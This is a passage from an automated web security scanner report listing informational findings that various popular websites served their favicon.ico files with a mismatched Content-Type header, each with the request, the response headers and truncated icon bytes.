User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mystart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:18 GMT
Server: Microsoft-IIS/5.0
Last-Modified: Wed, 09 Jun 2010 16:41:56 GMT
ETag: "1e15-47e-4c0fc454"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...
27.142. http://www.nationalreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationalreview.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalreview.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 18 Oct 2010 18:17:57 GMT
ETag: "29aec6-47e-492e83212bf40"
Cache-Control: max-age=604800, public
Expires: Fri, 15 Apr 2011 16:49:59 GMT
Content-Type: text/plain; charset=ISO-8859-1
X-Cacheable: YES: Cache-Control controlled
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:54:06 GMT
X-Varnish: 1720311782 1718742698
Age: 75848
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hit: HIT

............ .h.......(....... ..... ................................................................................................................~..E..s ..x$...O....~..............................
...[SNIP]...
27.143. http://www.netflix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netflix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:59 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Length: 1150
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

............ .h.......(....... ..... .....@....................    ...    ...    ...    ...    ........d...n.............    ...    ...    ...    ...    ...    ...    ...    ...    ....[. .#. .#. .#. .#. .#. .#. .#..    ...    ...    ...    ...    ...    ...    
...[SNIP]...
27.144. http://www.newgrounds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newgrounds.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newgrounds.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:23 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Mon, 29 Oct 2007 21:37:52 GMT
ETag: "54a9ab-47e-43da883360c00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.145. http://www.newsdaily7.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsdaily7.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsdaily7.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Feb 2011 21:56:27 GMT
ETag: "668058-47e-49b53b88298c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

............ .h.......(....... ..... .....@....................I...I...H...H...H...G...^2..nG..nG..W'..G...H...H...H...I...K...H...9...9...9...9...8....|..........}_..8...9...9...9...8...H...F...8...8
...[SNIP]...
27.146. http://www.newsok.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsok.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsok.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd070-1536-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 12:52:30 GMT
Age: 195
Content-Length: 5430

............ .h...&... .... .........(....... ..... .........................333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.865.OHA.ZPG.YOF.JD?.544.333.333.333.33
...[SNIP]...
27.147. http://www.nextag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextag.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:11 GMT
Server: Apache-Coyote/1.1
ETag: W/"422-1300382930000"
Last-Modified: Thu, 17 Mar 2011 17:28:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 422
Vary: Accept-Encoding,User-Agent
X-Cnection: close

GIF89a.....?....3f........ff.........Bh.......k{..HH...Jx....No.c...)!9k................................33.1)......Z.....{...JR.11......R{........)1.............9B..........ZZs..f...Zc.....{{...RZ.)).
...[SNIP]...
27.148. http://www.northerntool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.northerntool.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northerntool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='NOI DSP COR NID OTPi OUR NOR'
Last-Modified: Thu, 29 Mar 2007 21:39:01 GMT
ETag: "2ab98-47e-9548a740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=windows-1252
Date: Sat, 02 Apr 2011 13:44:46 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=northerntool.com

............ .h.......(....... ..... .....@...................................c..&EQ.
*7.
*7.
*7.
*7.&EQ.c..............................&EQ.
*7..p...................p......&EQ.....................
*
...[SNIP]...
27.149. http://www.oodle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private, max-age=2592000
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Expires: Fri, 11 Feb 2011 02:22:44 GMT
Content-Type: image/gif
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 1150
Connection: close

............ .h.......(....... ..... .............................................................................................................................w...>~................................
...[SNIP]...
27.150. http://www.opportunity.co/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.opportunity.co
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opportunity.co
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 29 Apr 2010 14:38:22 GMT
ETag: "47b059c-47e-1413b380"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .............................t...t...t...t...t...t...t...t...t...t...t...t...t...t.......X...@...9~..!o..f...........9~..!o..!o..i...........9~..!o..t...X.........
...[SNIP]...
27.151. http://www.oprah.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oprah.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oprah.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 21 Jan 2010 20:22:10 GMT
ntCoent-Length: 1150
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Cache-Control: private, max-age=900
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 1150
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

............ .h.......(....... ..... .........................C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|
...[SNIP]...
27.152. http://www.orientaltrading.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orientaltrading.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orientaltrading.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 01 Sep 2009 21:19:53 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:02 GMT
Connection: close

..............h.......(....... ....................................k...........q...................n...w...............t...........z...............l...........m...v...........s.......|...y.......m...v
...[SNIP]...
27.153. http://www.ourstage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ourstage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourstage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: haproxy
Last-Modified: Fri, 03 Jul 2009 01:23:45 GMT
ETag: "10261-57e-46dc301e9ea40"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................>.......d3..!.}.-.Q.4.......nB....r.    .#.%.....k...S...(...<.................1...+...Z%.......p..*.......U@..9............b..kQ....I...
...[SNIP]...
27.154. http://www.ovguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ovguide.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ovguide.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 09 Nov 2010 01:42:39 GMT
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .............................P7.OP7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7.O....P7.OP7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7.OP7..7%....
...[SNIP]...
27.155. http://www.partypoker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.partypoker.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.partypoker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 07 Oct 2010 12:02:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:33:48 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=89
Content-Type: text/plain
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 13:37:52 GMT
Age: 0
Content-Length: 1150

............ .h.......(....... ..... .............................................jjj.'''.........""".ddd.................................jjj.......3..H...........O.......&H.gln.....................AA
...[SNIP]...
27.156. http://www.payless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.payless.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payless.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "47e-49aec65757b00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:48 GMT
Connection: close

............ .h.......(....... ..... ............................................@...........................A..........................................................................................
...[SNIP]...
27.157. http://www.pctools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pctools.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pctools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 31 Aug 2008 23:34:49 GMT
ETag: "73e3a8-57e-455c9eebd1840"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from www3.pctools.com:8080
Date: Sat, 02 Apr 2011 13:43:49 GMT
Content-Length: 1406
Connection: close

..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K.......
...[SNIP]...
27.158. http://www.phoenix.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phoenix.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoenix.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 21:49:33 GMT
ETag: "47e-44c9d540"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

............ .h.......(....... ..... ................................................M.......I....&&.....+........................................,,.....x....PP.........<..............................
...[SNIP]...
27.159. http://www.phoneagentsource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phoneagentsource.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoneagentsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:54 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 09 Mar 2011 07:44:32 GMT
Content-Length: 17542
X-Varnish: 723278010 723267690
Age: 72
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...
27.160. http://www.pittsburghlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pittsburghlive.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pittsburghlive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:00 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Fri, 11 Mar 2011 14:45:55 GMT
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding,User-agent
Content-Type: text/plain

..............h.......(....... ..................................................................................DFG?>@TSU}|.mlp......RPO.........SSSA@D65>......(*+.........87;.........WYS......372...
...[SNIP]...
27.161. http://www.playfin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playfin.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playfin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1121-47e-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................................................................q;..{`..s..aO
.<'...........................................x
...[SNIP]...
27.162. http://www.playstation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playstation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playstation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:59 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 06:59:39 GMT
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@...............................@@B.........!!#.....bbc.........PPP.....qqr.....223.....YY[.......
.....................yyz.GGH.............;;
...[SNIP]...
27.163. http://www.playsushi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playsushi.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playsushi.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:50 GMT
Server: Apache
Last-Modified: Fri, 05 Jun 2009 18:08:30 GMT
ETag: "1d98c58-57e-46b9dc79f8380"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=7257600
Expires: Sat, 02 Apr 2011 18:34:50 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...........................3Q..........9~......:...*e..eee.8..............................HBL.........999.:::.........!!!.7...7...    ...........6.......3G
...
...[SNIP]...
27.164. http://www.politico.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.politico.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.politico.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 17 Mar 2008 15:14:07 GMT
ETag: "ffc38-37e-7898edc0"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:31:55 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 894
Connection: close

..............h.......(....... ..........................................................................................................................................._Z....rm......................
...[SNIP]...
27.165. http://www.polyvore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.polyvore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.polyvore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Polyvore Web Server
Date: Sat, 02 Apr 2011 13:41:52 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 21:25:48 GMT
Accept-Ranges: bytes
Content-Length: 894

..............h.......(....... ...........................................................................................................................................@@@@@@........................
...[SNIP]...
27.166. http://www.popsugar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popsugar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Sat, 02 Apr 2011 13:59:05 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...
27.167. http://www.poptropica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.poptropica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.poptropica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: Keep-Alive
Date: Thu, 09 Dec 2010 19:11:15 GMT
Server: TUX/2.0 (Linux)
Content-Length: 3638
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:19 GMT

..............h...&... ..............(....... ...........@.....................................P.......q.......7......._...............e.......H...'.......[...T...............0.......A...............
...[SNIP]...
27.168. http://www.potterybarn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

..............h.......(....... .......................................................


..................................+++.333.666.888.<<<.JJJ.NNN.QQQ.RRR.TTT.UUU.VVV.WWW.XXX.aaa.jjj...........
...[SNIP]...
27.169. http://www.prlog.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.prlog.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prlog.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:48 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 18:45:31 GMT
ETag: "1dd82fa-13e-49c061a4048c0"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
27.170. http://www.pronto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... .....@.............................................`3..........................................................b...[...[6..........................................
...[SNIP]...
27.171. http://www.qualityhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
